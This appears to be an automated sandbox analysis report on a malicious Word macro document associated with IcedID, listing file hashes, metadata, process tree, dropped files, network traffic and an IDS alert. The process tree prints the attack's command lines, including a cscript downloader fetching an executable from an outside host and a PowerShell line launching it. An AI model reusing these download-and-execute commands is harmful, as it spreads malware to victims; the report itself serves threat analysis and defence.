File name: | 2020-03-27-Word-doc-with-macro-for-IcedID.bin |
Full analysis: | https://app.any.run/tasks/a6b43b96-9c68-40a0-b7d1-76f8a5967cbd |
Verdict: | Malicious activity |
Analysis date: | March 30, 2020, 21:21:07 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | BB1F29916D4C7CCC1E4931E309087017 |
SHA1: | 36521883685512B5FC5138FE6E82F940142EA0BF |
SHA256: | 8C70BFE95C8909258E32A38AB754CA9EAC9FC144E315F30592EA9B6D9F6638C7 |
SSDEEP: | 3072:LpXZGlvSYndc9yi7DK7kTV9MUqOfjLnUe0vO2XMdDSix+gPgxGXh+Mn4swT+S:9XUlvznti7G74UofjLWW2XCzxCGXL4s+ |
.docm | | | Word Microsoft Office Open XML Format document (with Macro) (53.6) |
---|---|---|
.docx | | | Word Microsoft Office Open XML Format document (24.2) |
.zip | | | Open Packaging Conventions container (18) |
.zip | | | ZIP compressed archive (4.1) |
AppVersion: | 14 |
---|---|
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | 1 |
LinksUpToDate: | No |
Company: | SPecialiST RePack |
TitlesOfParts: | - |
HeadingPairs: |
|
ScaleCrop: | No |
Paragraphs: | 1 |
Lines: | 1 |
DocSecurity: | None |
Application: | Microsoft Office Word |
Characters: | 1 |
Words: | - |
Pages: | 1 |
TotalEditTime: | 2.0 days |
Template: | Normal.dotm |
ModifyDate: | 2020:03:26 11:25:00Z |
CreateDate: | 2020:03:24 10:37:00Z |
RevisionNumber: | 126 |
LastModifiedBy: | Пользователь Windows |
Creator: | Windows User |
---|
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 2011 |
ZipCompressedSize: | 484 |
ZipCRC: | 0xe9ce927d |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3232 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2020-03-27-Word-doc-with-macro-for-IcedID.bin.docm" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
1356 | cmd /c ""C:\User_Foto\Soterios.bat" " | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3240 | cscript //nologo c:\User_Foto\Transfer.vbs http://conceptinteriors.ae/ttt.exe C:\User_Foto\Jili#$Ma.exe | C:\Windows\system32\cscript.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Console Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2348 | powershell -C Sleep -s 6;Saps 'C:\User_Foto\Jili#$Ma.exe' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2540 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NTVDM.EXE Exit code: 255 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3232 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR68F3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3232 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\78RFYB7Z\config14[1].xml | — | |
MD5:— | SHA256:— | |||
3232 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CabE7AA.tmp | — | |
MD5:— | SHA256:— | |||
3232 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\TarE7AB.tmp | — | |
MD5:— | SHA256:— | |||
3232 | WINWORD.EXE | C:\User_Foto\Soterios2 | — | |
MD5:— | SHA256:— | |||
3232 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48DAF017.jpeg | — | |
MD5:— | SHA256:— | |||
3232 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF46C9973EF743C3FF.TMP | — | |
MD5:— | SHA256:— | |||
3232 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF5DA5F39FC4617E73.TMP | — | |
MD5:— | SHA256:— | |||
3232 | WINWORD.EXE | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_C9FB72B5AE80778A08024D8B0FDECC6F | binary | |
MD5:19D5C2114646EF140E0C517C76060D80 | SHA256:F6FADC6FE3033DCF7E29430F20238D3B875FEF048B80CB8B8356B8E79AAED872 | |||
3232 | WINWORD.EXE | c:\User_Foto\Soterios.bat | text | |
MD5:BF537D8DDD344ED1ABBEF6466C96403B | SHA256:833D0802856BD63783C8F1A66C9FB3C162342A339185D9C975DBD320378C063A |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3232 | WINWORD.EXE | GET | 200 | 52.109.76.6:80 | http://office14client.microsoft.com/config14?UILCID=1033&CLCID=1033&ILCID=1033&HelpLCID=1033&App={019C826E-445A-4649-A5B0-0BF08FCC4EEE}&build=14.0.6023 | IE | xml | 1.99 Kb | whitelisted |
3232 | WINWORD.EXE | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAtqs7A%2Bsan2xGCSaqjN%2FrM%3D | US | der | 1.47 Kb | whitelisted |
3240 | cscript.exe | GET | 302 | 162.241.24.233:80 | http://conceptinteriors.ae/ttt.exe | US | html | 305 b | suspicious |
3240 | cscript.exe | GET | 200 | 162.241.24.233:80 | http://conceptinteriors.ae/cgi-sys/suspendedpage.cgi | US | html | 7.42 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3232 | WINWORD.EXE | 52.109.76.6:80 | office14client.microsoft.com | Microsoft Corporation | IE | whitelisted |
3232 | WINWORD.EXE | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
3232 | WINWORD.EXE | 52.109.8.27:443 | rr.office.microsoft.com | Microsoft Corporation | US | whitelisted |
3240 | cscript.exe | 162.241.24.233:80 | conceptinteriors.ae | CyrusOne LLC | US | suspicious |
Domain | IP | Reputation |
---|---|---|
office14client.microsoft.com |
| whitelisted |
rr.office.microsoft.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
conceptinteriors.ae |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3240 | cscript.exe | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile |